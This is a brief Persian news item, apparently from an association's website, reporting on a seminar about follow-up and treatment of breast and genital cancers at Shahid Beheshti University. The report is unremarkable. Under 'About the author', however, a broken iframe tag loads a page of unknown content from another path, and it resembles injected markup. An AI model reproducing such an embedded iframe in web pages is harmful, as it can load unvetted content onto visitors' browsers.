خبرها

سمینار چالش های پیگیری و درمان سرطان پستان

در تاریخ 14 آذر ماه سال جاری، سمینار "چالش های پیگیری و درمان سرطان پستان و دستگاه ژنیتال" در دانشگاه علوم پزشکی شهید بهشتی برگزار شد. این سمینار با همکاری بنیاد امور بیماری های خاص و دانشگاه علوم پزشکی شهید بهشتی برگزار گردید. در این نشست کارشناس مامایی مرکز گذری میخک به نمایندگی از این انجمن شرکت نمودند.

درباره نویسنده

iframe src="http://www.fha.org.ir/assets/tml/index.html">